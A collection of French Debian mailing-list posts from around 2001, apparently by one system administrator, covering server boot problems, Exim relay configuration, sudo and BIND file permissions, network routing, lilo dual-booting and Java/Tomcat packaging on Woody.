J'ai reporté tout à boot-floppies. Inchala ! pour qu'on retrouve cela sur les CD. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Dell 2650 et Debian
> > Une page très fournie sur Dell et Linux : http://domsch.com/linux/ > Le problème est spécifique au 2650. J'ai tout un tas d'autres modèles qui eux fonctionnent parfaitement. J'ai téléchargé la dernière disquette de boot 3.0.23. Même résultat, le système bloque après sym53c416. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Dell 2650 et Debian
Bonjour, Quelqu'un a-t-il une idée ? Avec un Dell Poweredge 2650 Bi-Pro / RAID et Potato ou Woody, le boot sur CD-ROM d'une machine vierge s'arrête a sym53c416.c. Après plus rien ne bouge. Le reset ne marche pas. Obligé de retirer le câble d'alim de la machine. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: java sur woody ?
> Donc comment faire pour avoir ce fichu jdk sur ma woody ? > (je me refuse de télécharger le .tar.gz et l'installer à la barbare..) > je veux une atp-get solution!). La 1.3 est dispo en .deb : deb ftp://ftp.oleane.net/pub/java-linux/debian woody non-free Marche bien avec Tomcat et mod-jk. Config pas évidente. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. .. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: Configuration d'un compte mail
> Maintenant je me trouve devant une proposition > de configuration de mon compte mail. > je vous le livre tel que c'est écrit sur l'écran : Choisie 5 pour y réfléchir plus tard. Tu pourras relancer la config d'Exim avec un "eximconfig". Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Exim et rewrite
Bonjour,
J'ai une question pour les power-users d'Exim.
J'ai une règle de rewrite qui me réécrit les mails qui sortent d'Apache
(php, CGI, etc).
[EMAIL PROTECTED] "${local_part:$header_from:[EMAIL PROTECTED]:$header_from:}"
Fr
Je cherche à empêcher l'envoi des mails dont le rewrite aurait échoué pour
une raison quelconque. C'est à dire rejeter ces mails.
Ceci généralement pour ces raisons :
- l'utilisateur n'a rien mis dans le From:
- le contenu du From: est invalide
- l'addresse email dans le From: n'existe pas. Ce qui fait que le mail
revient vers [EMAIL PROTECTED]
Je cherche donc à ajouter un test à ma règle de rewrite afin de rejeter les
amils dont le rewrite échoue (par exemple : Rewrite of
[EMAIL PROTECTED] yielded unparseable address: domain
missing or malformed in address @).
Merci pour votre aide.
Stef...
..
. Linux - Debian - php4 - Apache - MySQL - Infogerance .
. email: [EMAIL PROTECTED] - http://www.actionweb.fr .
. Tel: (0)141 906 100-Fax: (0)141 906 101.
..
Re: Vim et MacSSH
Merci, cela marche. C'est quand même bizarre. Il doit y avoir quelque chose qui a changé au niveau des définitions de terminal depuis quelques jours dans woody. Par exemple, nvi marchait très bien avec NiftyTelnet SSH (que j'utilise depuis des années) et d'un seul coup les flêches se sont mis à ne plus marcher (Usage: [[ affiché en bas). Du coup, j'ai essayé vim qui lui marche avec les flêches mais pose problème avec le copier/coller. MacSSH lui marche avec nvi et les flêches, et donne le même résultat avec le copier/coller. Stef... > Ce n est pas un probleme de terminal, mais un "probleme" au niveau de > vim : l autoindentation, ce qui est genant pour le copier coller... La > commande :set noautoindent te permet de la desactiver. > > Pour eviter ce genre de probleme, le copier coller se fait en vim, par > exemple, en selectionnant le texte en mode visuel (v), en faisant un > yank (y), puis un paste (p) .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Vim et MacSSH
Bonjour, Depuis quelques jours et après bien sur une dernier upgrade de woody... J'ai les copier/coller en vim qui déconnent. Le système ajoute des TAB, par exemple : J'ai cela : #AnonRequirePassword off RequireValidShell off DenyAll Je fais copier, je colle : #AnonRequirePassword off RequireValidShell off DenyAll Quelqu'un a-t-il ce type de problème aussi ? Si je prend un autre émulateur de terminal, j'ai par exemple aussi des problème avec les flêches du clavier qui ne marchent plus sous nvi. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: TR: Logs d'apache
> J'ai un problème avec un serveur Apache+Tomcat. Ce dernier écrit étrangement > dans le fichier de logs : les lignes ne sont pas rangées par ordre > chronologique. Tu dois avoir un problème avec ton install Tomcat. Chez moi, les logs de mod_jk sont ok. Il faudrait donner les version des outils aussi pour que l'on puisse te répondre efficacement. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: [Débutant] Routeur
>> Il faut mieux avoir deux cartes Ethernet de marque différentes. > > Certainement pas. Pour moi si car c'est beaucoup plus sur comme cela pour savoir quel est la carte eth0 et eth1. Sans compter quel quelque fois, au boot les cartes change de sens. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: [Débutant] Routeur
> Je désire configurer ma Debian en routeur, j'ai donc installé les 2 cartes > réseaux les ai configurés, la machine voit les 2 réseaux (droite & gauche). > J'ai ensuite activé le forwarding /etc/network/ip_forward -> ip_forward = yes Si cela peux t'aider, voici la config que j'avais fait pour un proxy-arp (et ip_formward activé via /etc/network/options) : ## Configuration pour le firewall en mode proxy arp #auto eth1 iface eth1 inet static address 192.168.1.51 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 up echo "1" > /proc/sys/net/ipv4/conf/eth1/proxy_arp #auto eth2 iface eth2 inet static address 192.168.1.51 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.1 # delete bad route up ip route del 192.168.1.0/24 dev eth2 # route to gateway up ip route add 192.168.1.1 dev eth2 up echo "1" > /proc/sys/net/ipv4/conf/eth2/proxy_arp Il faut mieux avoir deux cartes Ethernet de marque différentes. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
[EMPLOI] Spécialiste JAVA/TOMCAT
Bonjour, Désolé de poster ici mais c'est quand même en rapport avec Debian. Je cherche un spécialiste JAVA / TOMCAT / APACHE sous Debian Woody pour optimiser une service JAVA / TOMCAT sur serveurs Web mutualisés. Objectifs : optimisation de la configuration en environnement mutualisé, sécurisation de la configuration, définition d'un gabarit de compte et écriture d'une doc d'utilisation. Travaux rémunérés. Lieu : Paris / Banlieue Sud. Possibilité de travailler sur une maquette en remote sur un serveur de test. Si vous avez le profil et un ou deux jours de disponibilité me contacter en privé ou directement par téléphone. Merci Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: [OT] Donne une station Sparc avec Debian install ée
>> Netaktiv se débarrasse d'une station Sparc, avec deux disques durs > > Plus la peine d'écrire ou de téléphoner, on a déjà plein de candidats > (c'est surprenant pour une machine vingt fois plus lente qu'un PC > Carrefour, Sparc reste une marque mythique). Ayez aussi une petite pensée pour les DEC Alpha qui finissent leurs jours au frais dans les salles machines sous Debian... Increvable. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: probleme sur un G4
> bonjour j'ai un probleme d'installation sur un > G4 il ne boot pas sur le cd , il me dit "wrong partition 1 signature" > si quelqu'un connais .. Tu pourrais quand même faire un coup deg groups.google avant de poster ici. Il donne plein de réponses sur une recherche de la phrase "wrong partition 1 signature". Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: MDA sous Debian
> t'installes le module exim de webmin, et là t'as que des cases à remplis. > pis un fois que ca marchera, t'iras voir les fichiers de conf, quelle > gueule ils ont, et tu t'occuperas d'affiner le bordel. Le module EXIM ??? Es-tu sur qu'il existe ? Il y en a un pour SendMail et Postfix, mais pas pour Exim. Exim est très bien. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: RAID 1 en IDE
> www.3ware.com (vendu en france par http://www.dataswift.fr/) > Leur cartes Escalade permettent de faire du RAID 1/5 hotplug hotswap. > De plus leur drivers sont opensource (contrairement aux drivers Promise). Oui, très bien. Mais ou acheter leur produits en France ? Je n'ai jamais trouvé d'importateur. Stef... Ps : personnellement, je DECONSEILLE le RAID soft via Kernel. J'ai essayé 2 fois. Chaque fois le système a été des plus déplorable en terme de fiabilité et de vitesse. Et je suis gentil. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: répondeur mail automatique
> On pourrait mettre un pipe vers un script derrièrre les adresses > d'activation/desactivation. Le script ecrirait un .forward dans le bon > /home/user. Problème: le script n'a pas le droit d'écrire dans les > /home/user. Je suis bloqué là. Install sudo et fait faire le boulot en lui donnant certains des droits de root. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Mémoire et 2.4.16
Pour info, Comportement d'un 2.4.16 (Woody) sur une machine avec 768 Mo de RAM. Au démarrage : aweb-dev:/home# free total used free sharedbuffers cached Mem:771524 126564 644960 0 4148 66480 -/+ buffers/cache: 55936 715588 Swap:64224 0 64224 8 heures après : aweb-dev:/home/www/bwacct# free total used free sharedbuffers cached Mem:771524 763760 7764 0 52968 506060 -/+ buffers/cache: 204732 566792 Swap:64224 17208 47016 2 jours après : aweb-dev:/home# free total used free sharedbuffers cached Mem:771524 765056 6468 0 36156 568464 -/+ buffers/cache: 160436 611088 Swap:64224 64220 4 La mémoire "free" bouge entre 6K et 25K. Aucun plantage par contre. Pas très beau le 2.4.16 ! En 2.2.19, seulement 150 Mo sont consommé... et cela bouge très peu. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Ou est le fichier de demarrage ?
> Je migre petit à petit de Mandrake à Debian et je n'ai pas trouvé le fichier > équivalent à /etc/rc.local dans Debian. Pour l'instant je crée un srcipt de 2 > lignes (pour ipchains) dans /etc/rcS.d/ipchains et je fais un racourci dans > les /etc/rc*.d/, mais ca me plait pas trop. Alors quel est le fichier de > demarrage équivalent à rc.local ? Tous les script d'init sont dans /etc/init.d/ Faire un man update-rc.d pour le reste. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Paquet à moitié installé
> On Tue, 18 Dec 2001 09:01:04 +0100 > Stephane Leclerc <[EMAIL PROTECTED]> wrote: > >> Quelqu'un a-t-il une autre solution pour "réparer" mon système ? > > résister à la tentation des méthodes barbares ;-) > >> aweb-dev:/home# dpkg --remove --force-remove-reinstreq bwm >> (Reading database ... 29137 files and directories currently > installed.) >> Removing bwm ... >> dpkg: error processing bwm (--remove): >> subprocess post-removal script returned error exit status 1 >> Errors were encountered while processing: >> bwm > > Le message indique que c'est le script qui suit le retrait du paquet > qui foire. Ce script doit s'appeler qqchose comme bwm.postrm > et se trouve dans /var/lib/dpkg/info. A priori c'est un script > perl donc on peut l'éditer, le modifier pour déterminer ce > qui coince (et donc corriger/éliminer le problème bloquant). > > ça peut prendre 5mn comme un peu plus... > A+ Merci. Trouvé -> script shell pourri dans bwm.postrm. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Paquet à moitié installé
Bonjour, J'ai eu la mauvaise idée d'installer la paquet bwm de sid sur une machine sid. Celui-ci n'a pas été complètement installé et je n'arrive pas à le virer. Il me bloque tout le processus dpkg ou apt-get. Même --force-remove-reinstreq ne marche pas. Quelqu'un a-t-il une autre solution pour "réparer" mon système ? aweb-dev:/home# dpkg --remove --force-remove-reinstreq bwm (Reading database ... 29137 files and directories currently installed.) Removing bwm ... dpkg: error processing bwm (--remove): subprocess post-removal script returned error exit status 1 Errors were encountered while processing: bwm .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Windows en hdb1
J'ai cela et cela marche très bien avec lilo : # /etc/lilo.conf - See: `lilo(8)' and `lilo.conf(5)', initrd=/initrd.img lba32 boot=/dev/hda #root=/dev/hda5 install=/boot/boot.b map=/boot/map delay=20 timeout=200 prompt vga=normal default=Linux2.4.16-k6 image=/boot/vmlinuz-2.2.19 label=Linux2.2.19 root=/dev/hda5 image=/boot/vmlinuz-2.4.16-k6 label=Linux2.4.16-k6 root=/dev/hda5 other=/dev/hdb1 label=NT4 table=/dev/hdb map-drive=0x80 to=0x81 map-drive=0x81 to=0x80 >> bonjour >> J'ai installé un disque contenant 'windows 98' en hdb >> installé ailleurs à l'origine >> j'ai ajouté dans lilo.conf >> >> default=linux >> prompt >> timeout=50 >> other=/dev/hdb1 >> label=windows >> table=/dev/hdb >> >> mais si je sélectionne windows au démarrage il ne se passe pas grand >> chose >> sans doute manque t-il une information de loader >> >> .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Le retour du Netra X1
Pour ceux qui se souvienne, j'ai testé l'installation d'une woody sur SUN Netra X1 il y a quelques semaines. Sans succès. Avec les toutes nouvelles disquette de boot 3.0.18 cela fonctionne maintenant (via la methode bootp). J'ai pu installer la distrib jusqu'au moment ou on défini le mot de passe root et on passe sur un boot sur le disque. Je peux maintenant booter la machine. Par contre, je tombe maintenant sur un nouveau problème. Comme la Netra X1 n'a pas de carte écran. Je plante. J'ai essayé de bricoler inittab en montant la partition en manuel mais pour l'instant le résultat n'est pas brillant. Initializing random number generator... done. Recovering nvi editor sessions... done. Setting audio parameters...none. INIT: Entering runlevel: 2 Starting system log daemon: syslogd. Starting kernel log daemon: klogd. Starting internet superserver: inetd. Starting deferred execution scheduler: atd. Starting periodic command scheduler: cron. /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device /bin/sh: /dev/tty1: No such device INIT: Id "1" respawning too fast: disabled for 5 minutes IId "3" respawning too fast: disabled for 5 minutes INIT: Id "2" respawning too fast: disabled for 5 minutes INIT: no more processes left in this runlevel Et cela s'arrête là. Comme le reste n'est pas encore chargé, je ne peux pas atteindre la machine via le réseau. J'aurais besoin d'un peu d'aide. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Recherche Serveur FireWall
> Bonjour, je cherche comment faire un firewall facilement configurable et > sécurisé. http://www.smoothwall.org/ Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Sudo et accès répertoire
> Tu peux essayer de mettre la commande umask dans le > /etc/init.d/named|bind avant le lancement du démon, mais s'il est bien > fichu, il va le redéfinir dans le binaire, ce qui ne t'arrange pas. Déjà essayé. Pas de bol. Pas si con que cela le bind. > Tu peux toujours aller trifouiller dans les sources. Tiens, c'est dans > ns_main.c, ligne 267 : > > (void) umask(022); Ne m'amuse pas mais, je ne vois pas une autre solution. Je vais voir quand même avec mon chmod même si je n'aime pas trop coté sécurité. > Pas de bol, c'est en dur. A mon avis, il faut changer et recompiler. Tu > peux en profiter pour lui demander de mettre le bon user qui t'arrange > au passage. Pour la compilation, je sort du apt-get upgrade classique. Encore moins amusant. > Pour info, il y a un autre umask(022 dans named-xfer.c. J'ai regardé bind9, même topo. Merci Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Sudo et accès répertoire
Me revoilà après un rv. J'ai aussi pensé au chmod. Par contre, existe-t-il un moyen de changer le mask par défaut (022). Bind tourne sous root. Je ne veux bien sûr pas changer le mask par défaut de root mais seulement le mask par défaut pour le deamon bind quand il écrit des fichiers dna /etc/bind. J'ai un peu cherché sur google mais je n'ai rien trouvé de concluant. Stef... >> Quand bind créé des fichiers dans le répertoire bind (cas de la mise à > jour >> en secondaire), il les créait avec un masque -rw-r--r--. Je ne peux > donc pas >> y toucher avec remoteuser en groupe. >> > > Tu mixtes alors avec la méthode précédente en mettant le chmod autorisé > pour ton remoteuser. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Sudo et accès répertoire
Zut encore un problème. Quand bind créé des fichiers dans le répertoire bind (cas de la mise à jour en secondaire), il les créait avec un masque -rw-r--r--. Je ne peux donc pas y toucher avec remoteuser en groupe. Stef... > C'était si simple. > > chmod -R g+ws bind > chgrp remoteuser bind > > Les fichiers créés par bind (en slave) passe en GID remoteuser et je n'ai > plus de problème pour faire mon ménage en remote. > > Merci > > > Stef... > > >>> Je n'arrive pas à trouver la bonne config pour le user remoteuser dans >> sudo) >> >> AMHA, tu prends le problème à l'envers. Crée un groupe dans lequel tu >> mettras ton remotuser uniquement et donne accès à /etc/bind uniquement à >> ce groupe. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Sudo et accès répertoire
Ouaa ! Encore une victime de "pourquoi faire simple quand on peut faire compliqué!". C'était si simple. chmod -R g+ws bind chgrp remoteuser bind Les fichiers créés par bind (en slave) passe en GID remoteuser et je n'ai plus de problème pour faire mon ménage en remote. Merci Stef... >> Je n'arrive pas à trouver la bonne config pour le user remoteuser dans > sudo) > > AMHA, tu prends le problème à l'envers. Crée un groupe dans lequel tu > mettras ton remotuser uniquement et donne accès à /etc/bind uniquement à > ce groupe. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Sudo et accès répertoire
Merci mais tu n'as pas bien lu ma question. Je cherche à ce que le user puisse faire ce qu'il veut dans /etc/bind alors que le répertoire et les fichiers appartiennent à root. rm n'était qu'un exemple. Cela eut aussi être cp, mv, ou autre mkdir... Stef... >> Je cherche à faire ceci avec ssh et sudo : >> >> ssh [EMAIL PROTECTED] 'sudo rm /etc/bind/named.conf' > > remoteuser ALL=(root) NOPASSWD: /usr/local/bin/script_qui_efface_named_conf > > avec > > rm /etc/bind/named.conf > > dans /usr/local/bin/script_qui_efface_named_conf. .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Sudo et accès répertoire
Bonjour, Appel aux spécialises sudo. Je cherche à faire ceci avec ssh et sudo : ssh [EMAIL PROTECTED] 'sudo rm /etc/bind/named.conf' Le répertoire /etc/bind/ et les fichiers dedans appartiennent à ROOT. En fin de compte, je voudrais que le user remoteuser puisse faire ce qu'il veut dans /etc/bind/ (et uniquement là !). Je n'arrive pas à trouver la bonne config pour le user remoteuser dans sudo. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: 2 interfaces réseaux, 2 IP, 2 gateways
> Mais là se pose le problème : je n'arrive pas à faire en sorte que chaque > interface réseau dispose de son gateway propre. Je n'ai pu que mettre un > gateway par défaut. Installe iproute et utilise la commande ip route help. Du style : ip route add xxx.xxx.xxx.xxx/xx dev eth1 Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Maps et exim
Bonjour, J'ai maps (mail-abuse.org) qui a du perfectionner ces tests et qui me déclare certain de mes serveurs en relay ouvert. Par exemple : >>> MAIL FROM:<[EMAIL PROTECTED]> <<< 250 <[EMAIL PROTECTED]> is syntactically correct >>> RCPT TO:<[EMAIL PROTECTED]> <<< 250 <[EMAIL PROTECTED]> verified >>> DATA <<< 354 Enter message, ending with "." on a line by itself >>> (message body) <<< 250 OK id=163EPV-0006YF-00 /proj/maps/rss/bin/rly: relay accepted - final response code 250 >>> RSET <<< 250 Reset OK Le message n'est pas envoyé car ce local user n'existe pas. Par contre MAPS me déclare le relay ouvert car le code de réponse est 250. J'ai bien mon "receiver_verify = true" dans la config. Comment résoudre ce problème ? Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Pb avec les quotas
> La machine est en woody. Quota v3 marche pas. Prendre le .deb de Potato. J'ai pas encore essayé la dernière version 3.0.1 de sid. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: "web based" nessus / SAINT
> Je dois mettre en place une Debian sur laquelle tournerait un outil de type > "scanner de vulnerabilités" (style nessus ou SAINT), disposant d'une intercae > web. Il doit être possible de lancer un scan sur une IP cible à partir d'une > page web, et de consulter les résultats via le web. > > Existe t il des frontend web pour nessus ou autre, voire carrément des outils > 100% web ? Si oui, où trouver les paquets deb (apt-cache ne me donne rien) ? ??? Ils y sont les paquets ! aweb-dev:/home/sleclerc# apt-cache search nessus harden-remoteaudit - Audit your system from this host. satan - Security Auditing Tool for Analysing Networks libnasl-dev - Nessus Attack Scripting Language, static library and headers libnasl1 - Nessus Attack Scripting Language, shared library libnessus-dev - Nessus static libraries and headers libnessus1 - Nessus shared libraries nessus - Remote network security auditor, the client nessus-dev - Nessus development header files nessus-plugins - Nessus plugins nessusd - Remote network security auditor, the server .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Règle de Firewall
> Pourquoi ne pas plutot utiliser les fichiers de conf de exim > et parametrer convenablement les parametres suivants? > > relay_domains = > no_relay_domains_include_local_mx > no_relay_match_host_or_sender > host_accept_relay = 127.0.0.1/8 > > Il y a aussi les rbl qui peuvent etre fort utiles: > rbl_domains = rbl.mail-abuse.org/reject : dialups.mail-abuse.org/warn Et si tu veux faire vraiment bien, tu branches Exim sur MySQL pour alimenter tous cela à distance sans soucis. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: fichier de config pour mirror
> je suis désolé du bruit, mais j'arrive pas a faire un fichier de config pour > faire un mirroir local de debian avec le paquet mirror. Donc, si quelqu'un > pouvait m'envoyer (en privé ?) le sien (et la commande magique), je lui en > serait reconnaissant. Ce script de [EMAIL PROTECTED] marche bien : http://cvs.kitenet.net/joey-cvs/bin/Attic/debmirror Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Technique Ramddr
> Je viens d'apprendre qu'il faut pour cette carte de la DDR PC2100, > mais "Registred" et non de la Unregistred. > > Mon Fournisseur est incapable de faire la différence. Registered ECC, mémoire généralement utilisée pour les serveurs. Tu ne trouveras pas se genre de barrettes dans la rue. Va voir chez SQP.FR. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Java avec netscape/mozilla
> Le Mardi 30 Octobre 2001 23:48, Stephane Leclerc a écrit : >>> Du paquet Java bien sûr. J'ai eu le même problème. Tu peux essayer >>> d'installer Java de BlackDown dans /usr/local/ plutôt qu'en paquet >>> Debian et utiliser un Java pur sucre testé Debian. > > Merci, c'était bien ça... Evidemment, j'ai passé du temps à tester avec > j2re1.3 ou j2sdk1.3 mais bon, fallait tout simplement le virer :-\ > >> Il y a des versions "Debian" dans http://incoming.debian.org/. >> >> wget http://incoming.debian.org/j2re1.3_1.3.1-1.1_i386.deb >> wget http://incoming.debian.org/j2sdk1.3_1.3.1-1.1_i386.deb > > Quelles sont les différences avec le debian officiel (BlackDown) ? En phase avec Tomcat. Après bien des tests et des problèmes, j'ai réussit à stabiliser l'installation avec les paquets suivants : j2re1.3 1.3.1-1.1 incoming java-common 0.7woody jikes1.14-0.6 sid libapache-mod-jk 3.2.3-1woody libservlet2.2-java 2.2-2 woody tomcat 3.2.3-4sid Les exemples fonctionnent en ip aliasés. Je n'ai plus d'erreur dans les logs. Les scripts d'INIT fonctionnent. Bien tout virer avec dpkg --purge avant (surtout jdk1.1) et vérifier qu'il ne reste pas de scorie. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Java avec netscape/mozilla
> Le Mardi 30 Octobre 2001 23:48, Stephane Leclerc a écrit : >>> Du paquet Java bien sûr. J'ai eu le même problème. Tu peux essayer >>> d'installer Java de BlackDown dans /usr/local/ plutôt qu'en paquet >>> Debian et utiliser un Java pur sucre testé Debian. > > Merci, c'était bien ça... Evidemment, j'ai passé du temps à tester avec > j2re1.3 ou j2sdk1.3 mais bon, fallait tout simplement le virer :-\ > >> Il y a des versions "Debian" dans http://incoming.debian.org/. >> >> wget http://incoming.debian.org/j2re1.3_1.3.1-1.1_i386.deb >> wget http://incoming.debian.org/j2sdk1.3_1.3.1-1.1_i386.deb > > Quelles sont les différences avec le debian officiel (BlackDown) ? En phase avec Tomcat. Après bien des tests et des problèmes, j'ai réussit à stabiliser l'installation avec les paquets suivants : j2re1.3 1.3.1-1.1 incoming java-common 0.7woody jikes1.14-0.6 sid libapache-mod-jk 3.2.3-1woody libservlet2.2-java 2.2-2 woody Les exemples fonctionnent en ip aliasés. Je n'ai plus d'erreur dans les logs. Les scripts d'INIT fonctionnent. Bien tout virer avec dpkg --purge avant (surtout jdk1.1) et vérifier qu'il ne reste pas de scorie. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Java avec netscape/mozilla
> Du paquet Java bien sûr. J'ai eu le même problème. Tu peux essayer > d'installer Java de BlackDown dans /usr/local/ plutôt qu'en paquet > Debian et utiliser un Java pur sucre testé Debian. Il y a des versions "Debian" dans http://incoming.debian.org/. wget http://incoming.debian.org/j2re1.3_1.3.1-1.1_i386.deb wget http://incoming.debian.org/j2sdk1.3_1.3.1-1.1_i386.deb Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
j2sdk1.3 et mozilla
Bonjour, En Woody, Quelqu'un sait-il pourquoi si j'essaye d'installer j2sdk1.3 (Blackdown Java sur ftp.free), les dépendances m'obligent a installer les 9 Mo de mozilla M18-3 ? Je ne vois vraiment pas ce qu'il vient faire dans cette galère. Stef... .. . Linux - Debian - php4 - Apache - MySQL - Infogerance . . email: [EMAIL PROTECTED] - http://www.actionweb.fr . . Tel: (0)141 906 100-Fax: (0)141 906 101. ..
Re: Installation sur un SUN NETRA X1
